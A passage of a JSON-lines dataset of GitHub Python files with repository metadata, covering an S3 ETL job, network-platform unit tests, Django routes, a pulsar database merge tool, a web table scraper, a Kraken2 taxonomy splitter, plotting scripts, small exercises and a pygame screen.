analytics no formato *.parquet...\")\n\n dfArquivo.write.parquet(\n path=f\"s3a://{BUCKET_ANALYTICS}/{diretorioArquivoCSV}\",\n mode=\"overwrite\")\n\n logging.info(f\"Arquivo {nomeArquivo} salvo no bucket analytics [{BUCKET_ANALYTICS}/{diretorioArquivoCSV}].\")\n\n # Fazer cópia do arquivo para a pasta processado e apagar da pasta de download\n novaChave = chave.replace(\"downloaded\", \"processed\")\n\n clientS3.copy_object(\n CopySource={'Bucket': BUCKET_RAW, 'Key': chave},\n Bucket=BUCKET_RAW,\n Key=novaChave)\n\n clientS3.delete_object(Bucket=BUCKET_RAW, Key=chave)\n\n logging.info(f\"Arquivo {nomeArquivo} movido para a pasta de processados.\")\n\nexcept Exception as e:\n logging.error(f\"Erro ao processar o arquivo {nomeArquivoCompactado}. [{e.args}]\")\n raise e\n","repo_name":"DanielCirino/eng-dados-snif-florestal","sub_path":"floresta-plantada-etl/dags/job_converter_arquivo.py","file_name":"job_converter_arquivo.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7990341220","text":"#!/usr/bin/env python3\n\n###############################################################################\n# #\n# Program name: print_dict.py #\n# Purpose: Process data from the shell script and print the #\n# corresponding dictionary entries. #\n# #\n# Author: Josua Goecking #\n# GitHub: https://github.com/JosuaGoecking/weica #\n# #\n###############################################################################\n\nimport sys\n\npath=sys.argv[1]\nsys.path.insert(0, path)\n\nimport weica\n\nli=[]\nif len(sys.argv)==3:\n li=sys.argv[2].split(\";\")\n \nc=weica.consumption(\"q\")\n\nif len(li)!=0:\n c.print_dict(li)\nelse:\n c.print_dict()\n","repo_name":"JosuaGoecking/weica","sub_path":"bin/print_dict.py","file_name":"print_dict.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42324739861","text":"# Python\r\nimport unittest\r\n\r\n# pyATS\r\nfrom pyats.topology import Device\r\n\r\n# Genie\r\nfrom genie.libs.ops.platform.iosxe.c8200.platform import Platform\r\nfrom genie.libs.ops.platform.iosxe.c8200.tests.platform_output import PlatformOutput\r\nfrom genie.libs.parser.iosxe.show_platform import ShowVersion, \\\r\n Dir, \\\r\n ShowRedundancy, \\\r\n ShowInventory, \\\r\n ShowPlatform\r\nfrom genie.libs.parser.iosxe.show_issu import ShowIssuStateDetail,\\\r\n ShowIssuRollbackTimer\r\n\r\n\r\nclass TestPlatformAll(unittest.TestCase):\r\n\r\n maxDiff = None\r\n\r\n def setUp(self):\r\n self.device = Device(name='aDevice')\r\n self.device.os = 'iosxe'\r\n self.device.mapping={}\r\n self.device.mapping['cli']='cli'\r\n # Give the device as a connection type\r\n # This is done in order to call the parser on the output provided\r\n self.device.connectionmgr.connections['cli'] = self.device\r\n\r\n def test_complete_c8200(self):\r\n self.maxDiff = None\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.assertEqual(f.chassis, PlatformOutput.platform_all['chassis'])\r\n self.assertEqual(f.chassis_sn, PlatformOutput.platform_all['chassis_sn'])\r\n self.assertEqual(f.rtr_type, PlatformOutput.platform_all['rtr_type'])\r\n self.assertEqual(f.os, PlatformOutput.platform_all['os'])\r\n self.assertEqual(f.version, PlatformOutput.platform_all['version'])\r\n self.assertEqual(f.image, PlatformOutput.platform_all['image'])\r\n self.assertEqual(f.config_register, PlatformOutput.platform_all['config_register'])\r\n self.assertEqual(f.main_mem, PlatformOutput.platform_all['main_mem'])\r\n self.assertEqual(f.dir, PlatformOutput.platform_all['dir'])\r\n self.assertEqual(f.redundancy_mode, PlatformOutput.platform_all['redundancy_mode'])\r\n self.assertEqual(f.switchover_reason, PlatformOutput.platform_all['switchover_reason'])\r\n self.assertEqual(f.redundancy_communication, PlatformOutput.platform_all['redundancy_communication'])\r\n self.assertEqual(f.rp_uptime, PlatformOutput.platform_all['rp_uptime'])\r\n self.assertEqual(f.issu_rollback_timer_reason, PlatformOutput.platform_all['issu_rollback_timer_reason'])\r\n self.assertEqual(f.issu_rollback_timer_state, PlatformOutput.platform_all['issu_rollback_timer_state'])\r\n self.assertDictEqual(f.slot, PlatformOutput.platform_all['slot'])\r\n\r\n def test_missing_attributes_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n with self.assertRaises(KeyError):\r\n # slot 'R2' doesn't exist\r\n platform_slot_number = (f.slot['slot']['R2'])\r\n\r\n def test_ignored_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n g = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n g.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n g.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n g.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n g.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n g.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n g.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n g.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n g.learn()\r\n\r\n f.s = 2\r\n\r\n self.assertNotEqual(f, g)\r\n # Verify diff now\r\n diff = f.diff(g)\r\n sorted_diff = str(diff)\r\n sorted_result = ('+s: 2')\r\n self.assertEqual(sorted_diff, sorted_result)\r\n\r\n def test_selective_attribute_c8200(self):\r\n\r\n f = Platform(device=self.device, attributes=['slot[(.*)][(.*)][state]'])\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.assertIn('ok, active', f.slot['rp']['R0']['state'])\r\n\r\n def test_empty_parser_output_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n # loading empty output\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDirEmpty}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.maxDiff = None\r\n self.assertDictEqual(f.slot, PlatformOutput.platform_all_empty_dir['slot'])\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/ops-pkg/src/genie/libs/ops/platform/iosxe/c8200/tests/test_platform.py","file_name":"test_platform.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"23000761616","text":"\"\"\"mysite_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path, include\nfrom . import views\n\napp_name = 'main'\n\nurlpatterns = [\n path('', views.homepage, name='homepage'),\n path('register/', views.register, name='register'),\n path('logout/', views.logout_request, name='logout'),\n path('login/', views.login_request, name='login'),\n # 这是一个变量\n path('<single_slug>', views.single_slug, name='single_slug'),\n\n path('upload/', views.upload, name='upload'),\n path('books/', views.book_list, name='book_list'),\n path('books/upload', views.upload_book, name='upload_book'),\n path('books/<int:pk>/', views.delete_book, name='delete_book'),\n\n path('class/books/', views.BookList.as_view(), name='class_book_list'),\n path('class/books/upload', views.UploadBookView.as_view(), name='class_upload_book'),\n]\n","repo_name":"oceanwavechina/python_programming","sub_path":"mysite_django/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"375228197","text":"#!/usr/bin/env python\n\nfrom toaster import utils\nfrom toaster import errors\nfrom toaster import database\nfrom toaster.utils import cache\nfrom toaster.utils import notify\n\nSHORTNAME = 'merge'\nDESCRIPTION = \"Merge a pulsar entry in the database into another entry. \" \\\n \"This is useful when a second entry was created for a \" \\\n \"pulsar rather than creating an alias of an existing entry. \" \\\n \"This is an irreversible process.\"\n\n\ndef add_arguments(parser):\n parser.add_argument('-p', '--psr', dest='src_psrname', type=str,\n help=\"The pulsar to merge. NOTE: All instances \"\n \"of this pulsar's corresponding ID number \"\n \"will be changed in the database.\")\n parser.add_argument('--into', dest='dest_psrname', type=str,\n help=\"The pulsar entry to be merged into.\")\n\n\ndef merge_pulsar(src_pulsar_id, dest_pulsar_id, existdb=None):\n \"\"\"Merge one pulsar entry into another.\n\n Inputs:\n src_pulsar_id: The ID of the pulsar entry that will \n be merged.\n NOTE: This entry will no longer exist following\n the merge.\n dest_pulsar_id: The ID of the pulsar entry that will\n be merged into.\n\n existdb: A (optional) existing database connection object.\n (Default: Establish a db connection)\n\n Outputs:\n None\n \"\"\"\n notify.print_info(\"Merging pulsar '%s' (ID: %d) into '%s' (ID: %d)\" %\n (cache.get_pulsarname(src_pulsar_id), src_pulsar_id,\n cache.get_pulsarname(dest_pulsar_id), dest_pulsar_id), 2)\n # Connect to the database\n db = existdb or database.Database()\n db.connect()\n trans = db.begin()\n try:\n # Update all relevant entries in the database\n tables = [db.pulsar_aliases,\n db.timfiles,\n db.rawfiles,\n db.templates,\n db.parfiles,\n db.master_parfiles,\n db.master_templates,\n db.toas]\n values = {'pulsar_id': dest_pulsar_id}\n for table in tables:\n update = table.update().\\\n where(table.c.pulsar_id == src_pulsar_id)\n results = db.execute(update, values)\n results.close()\n\n # Remove now unused entry in the pulsars table\n delete = db.pulsars.delete().\\\n where(db.pulsars.c.pulsar_id == src_pulsar_id)\n results = db.execute(delete)\n results.close()\n except:\n trans.rollback()\n raise\n else:\n trans.commit()\n finally:\n if existdb is None:\n db.close()\n\n\ndef main(args):\n src_pulsar_id = cache.get_pulsarid(args.src_psrname)\n dest_pulsar_id = cache.get_pulsarid(args.dest_psrname)\n if src_pulsar_id == dest_pulsar_id:\n raise errors.BadInputError(\"Cannot merge '%s' (ID: %d) into \"\n \"itself ('%s')\" %\n (args.src_psrname, src_pulsar_id,\n args.dest_psrname))\n merge_pulsar(src_pulsar_id, dest_pulsar_id)\n\n\nif __name__ == '__main__':\n parser = utils.DefaultArguments(description=DESCRIPTION)\n add_arguments(parser)\n args = parser.parse_args()\n main(args)","repo_name":"plazar/TOASTER","sub_path":"toolkit/pulsars/merge_pulsar.py","file_name":"merge_pulsar.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70443114567","text":"import time\nimport matplotlib.pyplot as plt\nimport math\n\n\ndef main():\n with open('ProblemScaling.txt', 'r+') as f:\n lines = f.readlines()\n timeL = []\n for i in range(0,len(lines),2):\n times = lines[i + 1].split(' ')\n times = [[int(time) + 1,times[time]] for time in range(len(times)) if '\\n' not in times[time]]\n timeL += [[lines[i].replace('\\n',''), times]]\n plt.title(\"Weak Scaling Test\")\n print(timeL)\n # plt.axis([1,5,0, 25])\n\n for test in timeL:\n print(test)\n #Graphing strong scaling\n newResult = [float(test[1][0][1])/ float(timing[1]) for timing in test[1]]\n # print(newResult)\n # newResult = [(float(timing[1])) for timing in test[1]]\n newResult = [0] + newResult\n print(newResult)\n print(test[0])\n\n plt.plot(newResult, linewidth = 2.0, label = test[0])\n # plt.legend(bbox_to_anchor=(1.05, 1), loc=3, borderaxespad=0.)\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=4,\n ncol=1, borderaxespad=0.)\n plt.xlabel(\"Problem Scale\")\n plt.ylabel('Runtime (s)')\n plt.show()\n\n\n\ndef main2():\n with open('ProcessorTimesFinal.txt', 'r+') as f:\n lines = f.readlines()\n timeL = []\n for i in range(0,len(lines),2):\n times = lines[i + 1].split(' ')\n times = [[int(time) + 1,times[time]] for time in range(len(times)) if '\\n' not in times[time]]\n timeL += [[lines[i].replace('\\n',''), times]]\n #print(timeL)\n\n print(timeL)\n plt.title(\"Strong Scaling Efficiency vs Number of Processes\")\n plt.axis([1,5, 0, 1.6])\n for timeResult in timeL:\n # print(timeResult)\n # print(timeResult[1][0][0])\n\n #Scaling Efficiency Graph\n newResult = [[float(timeResult[1][0][1])/(float(timing[1]) *float(timing[0]))] for timing in timeResult[1]]\n newResult = [[0]] + newResult\n\n #For percentage graph\n # newResult = [[float(timing[1])/float(timeResult[1][0][1] *)] for timing in timeResult[1]]\n # newResult = newResult\n # newResult = [[0]] + newResult \n\n #Sqrt magnitude plot\n # newResult = [[math.sqrt(float(timing[1]))] for timing in timeResult[1]]\n # newResult = newResult\n # newResult = [[0]] + newResult\n if timeResult[0] == 'allhomes' or timeResult[0] == 'homes17' or timeResult[0] == 'homes18':\n plt.plot(newResult, linewidth = 2.0, label = timeResult[0])\n plt.legend(bbox_to_anchor=(1.02, 0., 1.5, .102), loc=3,\n ncol=1, borderaxespad=0.)\n\n plt.xlabel(\"Number of Processors\")\n plt.ylabel(\"Strong Scaling Efficiency\") \n #log graph\n # newResult = [[math.log(float(timing[1]))] for timing in timeResult[1]]\n # newResult = [[0]] + newResult\n # plt.plot(newResult, linewidth = 2.0)\n\n #print(newResult)\n # For real time plots\n #newResult = [[float(timing[1])] for timing in timeResult[1]]\n\n #plt.plot(timingResult[1], linewidth = 2.0)\n plt.show()\n\n\nif __name__ == '__main__':\n main2()","repo_name":"KanishkT123/ParallelCDC","sub_path":"graphData.py","file_name":"graphData.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10215947691","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport ctypes\nimport mmap\nimport os\nimport struct\n\nimport six\n\n\nPERTURB_SHIFT = 5\n\n\ndef stable_hash_py2(str_value):\n if not str_value:\n return 0\n x = ord(str_value[0]) << 7\n for c in str_value:\n x = ctypes.c_long(1000003 * x).value\n x ^= ord(c)\n\n x ^= len(str_value)\n return x\n\n\ndef stable_hash_py3(str_value):\n if not str_value:\n return 0\n x = str_value[0] << 7\n for c in str_value:\n x = ctypes.c_long(1000003 * x).value\n x ^= c\n\n x ^= len(str_value)\n return x\n\n\nstable_hash = stable_hash_py3 if six.PY3 else stable_hash_py2\n\n\nclass DirtyError(Exception):\n pass\n\n\nclass LedadaReadMap(object):\n\n def __init__(self, filepath):\n fd = os.open(filepath, os.O_RDONLY)\n self.buf = mmap.mmap(fd, 0, mmap.MAP_SHARED, mmap.PROT_READ)\n os.close(fd)\n if self.buf[:4] == b'LEDD':\n raise DirtyError('File is dirty.')\n if self.buf[:4] != b'LEDA':\n raise ValueError('Incorrect file format.')\n self.num_buckets = struct.unpack_from('I', self.buf, 4)[0]\n self.buckets_start = 8\n self.payload_start = self.buckets_start + self.num_buckets * 4\n\n def get(self, name, default=None):\n if self.buf[3] == 'D':\n raise DirtyError('File is dirty.')\n\n if isinstance(name, six.text_type):\n name = name.encode('utf8')\n\n hash_ = stable_hash(name)\n idx = hash_ & (self.num_buckets - 1)\n perturb = hash_\n if perturb < 0:\n perturb += 2 ** 64\n\n while True:\n chunk_pointer = struct.unpack_from('I', self.buf, self.buckets_start + idx * 4)[0]\n if not chunk_pointer:\n return default\n\n key_len, value_len = struct.unpack_from('HH', self.buf, chunk_pointer)\n key = struct.unpack_from('%ds' % key_len, self.buf, chunk_pointer + 4)[0]\n if key == name:\n return struct.unpack_from('%ds' % value_len, self.buf, chunk_pointer + 4 + key_len)[0]\n\n idx = (5 * idx) + 1 + perturb\n perturb >>= PERTURB_SHIFT\n idx &= (self.num_buckets - 1)\n\n def uget(self, name, default=None):\n result = self.get(name, default)\n if result is None:\n return None\n return result.decode('utf8')\n","repo_name":"modrykonik/ledadamap","sub_path":"ledadamap.py","file_name":"ledadamap.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"205300896","text":"import csv\nimport urllib\nimport time\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, render_template, request, url_for, redirect\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n\t# It's just a plain vanilla form. Just return it.\n\treturn render_template('index.html')\n\n@app.route(\"/scrapr\", methods=['POST'])\ndef parse():\n\t# Get the URL submitted, open the connection, get results, and start\n\t# parsing the object.\n\turl_to_fetch = request.form['url']\n\tconnection = urllib.urlopen(url_to_fetch)\n\ttext = connection.read()\n\tpage_soup = BeautifulSoup(text)\n\n\t# Open the CSV file for writing. We will end up returning this.\n\tcsvFilename = \"output_\" + str(int(time.time())) + \".csv\"\n\tcsvFile = open(\"static/\" + csvFilename, \"w\")\n\tcsvWriter = csv.writer(csvFile, delimiter=',')\n\n\t# For every table, create a soup to process all of its individual parts.\n\tfor table in page_soup.find_all(\"table\"):\n\t\ttable_soup = BeautifulSoup(str(table))\n\n\t\tfor body in table_soup:\n\t\t\tbody = BeautifulSoup(str(body))\n\t\t\trows = body.find_all(\"tr\")\n\n\t\t\tfor tr in rows:\n\t\t\t\tcols = tr.find_all([\"td\", \"th\"])\n\t\t\t\tcolsArr = []\n\n\t\t\t\tfor td in cols:\n\t\t\t\t\tdata_set = unicode(td.string).strip()\n\t\t\t\t\t\n\t\t\t\t\t# Expand any headers that might span more than 1 column.\n\t\t\t\t\tif \"colspan\" in td.attrs:\n\t\t\t\t\t\ttimes_to_repeat = int(td[\"colspan\"])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttimes_to_repeat = 1\n\n\t\t\t\t\t# Append to accumulated array as appropriate.\n\t\t\t\t\tif data_set.isdigit():\n\t\t\t\t\t\tdata_set = int(data_set)\n\n\t\t\t\t\tfor i in range(times_to_repeat):\n\t\t\t\t\t\tcolsArr.append(data_set)\n\n\t\t\t\tcsvWriter.writerow(colsArr)\n\n\t\t\t# Write an empty row just to give some space.\n\t\t\tcsvWriter.writerow([])\n\tcsvFile.close()\n\n\treturn redirect(url_for(\"static\", filename=csvFilename))\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug = True, port=8080)","repo_name":"mauryquijada/scrapr","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8618437203","text":"# import pandas as pd\n\n# file_paths = ['C:/Users/HP/Desktop/appname.xlsx', 'C:/Users/HP/Desktop/developername.xlsx', 'C:/Users/HP/Desktop/appname.xlsx/appemail.xlsx', 'C:/Users/HP/Desktop/reviews.xlsx', 'C:/Users/HP/Desktop/charge.xlsx']\n# column_names = ['Email-Phone', 'Appname', 'Developername', 'AppEmail', 'Review', 'Charge']\n\n# dfs = []\n# for file_path in file_paths:\n# data = pd.read_excel(file_path)\n# dfs.append(data)\n# merged_data = pd.concat(dfs, ignore_index=True)\n# merged_data.columns = column_names\n# merged_data.to_excel('merged_file.xlsx', index=False)\n\nimport pandas as pd\n\nfile_paths = [\n 'D:/wanbuffer/django/emailphone.xlsx',\n 'D:/wanbuffer/django/appname.xlsx',\n 'D:/wanbuffer/django/developername.xlsx',\n 'D:/wanbuffer/django/appemail.xlsx',\n 'D:/wanbuffer/django/charge.xlsx',\n 'D:/wanbuffer/django/rating.xlsx',\n 'D:/wanbuffer/django/reviews.xlsx'\n]\ncolumn_names = ['Email-Phone', 'Appname', 'Developername', 'AppEmail', 'Charge', 'Rating', 'Review']\n\ndfs = []\nfor file_path in file_paths:\n data = pd.read_excel(file_path)\n dfs.append(data)\n\nmerged_data = pd.concat(dfs, axis=1)\nmerged_data.columns = column_names\n\nmerged_data.to_excel('merged_file1.xlsx', index=False)\n","repo_name":"lakumbhavdip/webscraping","sub_path":"mergeexcel.py","file_name":"mergeexcel.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11935366010","text":"valores = input().split()\nN1, N2, N3, N4 = valores\n\nN1 = float(N1)\nN2 = float(N2)\nN3 = float(N3)\nN4 = float(N4)\n\nnotaExame = 0.0\nmedia = ((N1*2)+(N2*3)+(N3*4)+(N4*1))/10\n\nprint(\"Media: %.1f\" %media)\n\nif (media >= 7.0):\n print(\"Aluno aprovado.\")\n\nif (media < 5.0):\n print(\"Aluno reprovado.\")\n\nif (media >= 5.0 and media <= 6.9):\n print(\"Aluno em exame.\")\n notaExame = float(input())\n print(\"Nota do exame: %.1f\" %notaExame)\n media = (media + notaExame) /2\n\n if (media >=5.0):\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n print('Media final: %.1f' %media)\n","repo_name":"alexsfo/uri-online-judge-python","sub_path":"URI_1040.py","file_name":"URI_1040.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626138568","text":"#translates NCBI taxids in default kraken2 output to names in 'mpa' style using Taxonkit\n#modified by James Riddell (riddell.26@buckeyemail.osu.edu) to output only the sequence headers separated into three files based on the taxonomic domain of the sequence assigned by kraken2\nfrom argparse import ArgumentParser\nimport subprocess\n\n#get the default kraken2 output and the file to save translated names file to\nparser = ArgumentParser()\nparser.add_argument(\"--infile\",dest=\"infile\", help=\"Kraken output file to be translated: <sample>-krak.txt\")\nargs = parser.parse_args()\n\n#open the files\ninfile = open(args.infile, 'r')\nsample = args.infile.split('-krak.txt')[0]\nbac_outfile = open(sample + '-krak-bacteria.txt', 'w')\narch_outfile = open(sample + '-krak-archaea.txt', 'w')\neuk_outfile = open(sample + '-krak-eukaryota.txt', 'w')\n\n#read name to taxid mapping\nreadnames=[]\ntaxids=[]\n\n#unique taxids to find the taxonomic names for\nuniqueids=[]\n\n#go through each kraken result and get taxids\nfor i in infile:\n row = i.split(\"\\t\")\n readname = row[1]\n taxid = row[2]\n readnames.append(readname)\n taxids.append(taxid)\n if taxid not in uniqueids:\n uniqueids.append(taxid)\n\n#dictionary to store found ids\nbac_taxdic={}\narch_taxdic={}\neuk_taxdic={}\n\n#get the full lineage names for unique taxids using Taxonkit\ntaxonkit = subprocess.check_output(\"echo '{}' | taxonkit lineage | taxonkit reformat\".format(\"\\n\".join(uniqueids)), shell=True)\ntaxonkit=taxonkit.decode().split(\"\\n\")\n\n#taxonomic levels\nlevs=[\"d__\",\"p__\",\"c__\",\"o__\",\"f__\",\"g__\",\"s__\"]\n\n#function to generate the mpa name from a given taxid by calling Taxonkit\ndef formName(name):\n names = name.split(\";\")\n formnames = []\n for i in range(len(names)):\n if names[i] != \"\":\n formnames.append(levs[i]+names[i].replace(\" \",\"_\"))\n return(\"|\".join(formnames))\n\n#reformat to mpa style\nfor i in taxonkit:\n if i != \"\":\n row=i.split(\"\\t\")\n tid=row[0]\n mpaname=formName(row[2])\n if 'd__Bacteria' in mpaname:\n bac_taxdic[tid] = mpaname\n elif 'd__Archaea' in mpaname:\n arch_taxdic[tid] = mpaname\n elif 'd__Eukaryota' in mpaname:\n euk_taxdic[tid] = mpaname\n\n#write the translated read to taxname file\nfor i in range(len(readnames)):\n t=taxids[i]\n if t in bac_taxdic:\n bac_outfile.write(\"{}\\n\".format(readnames[i]))\n elif t in arch_taxdic:\n arch_outfile.write(\"{}\\n\".format(readnames[i]))\n elif t in euk_taxdic:\n euk_outfile.write(\"{}\\n\".format(readnames[i]))\nbac_outfile.close()\narch_outfile.close()\neuk_outfile.close()\n","repo_name":"jamesriddellv/euk-metagenomics-pipeline","sub_path":"translatekraken2_prebin.py","file_name":"translatekraken2_prebin.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5646901989","text":"# if n is even n > n / 2\n# if n is odd n -> 3n + 1\n\n#if we use 13 as a start: 13 > 40 > 20 > 10 > 5 > 16 > 8 > 4 > 2 > 1\n\n# there is no proof but we believe all sequences end at 1\n\n# find the longest sequence starting with a number under 1000000\n\n# powers of 2 will be fastest route down\n\n# we dont need to append first and last terms as they are in every list, also i assume it would be odd\n\ndef even(number):\n newNumber = number / 2\n return newNumber\n\n\ndef odd(number):\n newNumber = (3 * number) + 1\n return newNumber\n\nlargest_term = 0\nlargest_terms = []\n\nfor half_term in range(499999):\n term = (half_term * 2) + 1\n terms = []\n original_term = term\n while term != 1:\n if term % 2 == 0:\n newTerm = even(term)\n terms.append(newTerm)\n term = newTerm\n else:\n newTerm = odd(term)\n terms.append(newTerm)\n term = newTerm\n if len(terms) > len(largest_terms):\n largest_terms = terms\n largest_term = original_term\n\n\n\nprint(largest_term)\n\n","repo_name":"bencouser/project_euler","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74294333767","text":"import pygame\n\nfrom py_files.file_with_const import WIDTH, HEIGHT, clock, FPS\nfrom load_img import load_image\nfrom terminate import terminate\n\n\ndef you_dead(surface):\n \"\"\"fon = pygame.transform.scale(load_image('save_btn.jpg'), (WIDTH, HEIGHT))\n surface.blit(fon, (0, 0))\n\n font = pygame.font.SysFont('arial', HEIGHT // 25)\n text = font.render('*НАЖМИТЕ НА ЛЮБУЮ КЛАВИШУ ДЛЯ ПРОДОЛЖЕНИЯ*', True, 'dark red')\n text_x = WIDTH * 0.1\n text_y = HEIGHT * 0.8\"\"\"\n\n fon = pygame.transform.scale(load_image('killing_window.png'), (WIDTH, HEIGHT))\n surface.blit(fon, (0, 0))\n while True:\n\n \"\"\"surface.blit(text, (text_x, text_y))\"\"\"\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n terminate()\n\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n\n pygame.display.flip()\n clock.tick(FPS)","repo_name":"KsenyaShestakova/pygame_project_Shestakova_Potapova","sub_path":"screens/SCREEN_dead.py","file_name":"SCREEN_dead.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5343486131","text":"#Advent of Code 2018 day 12\nfrom util import *\nDAY = 12\nYEAR = 2018\n\ndef 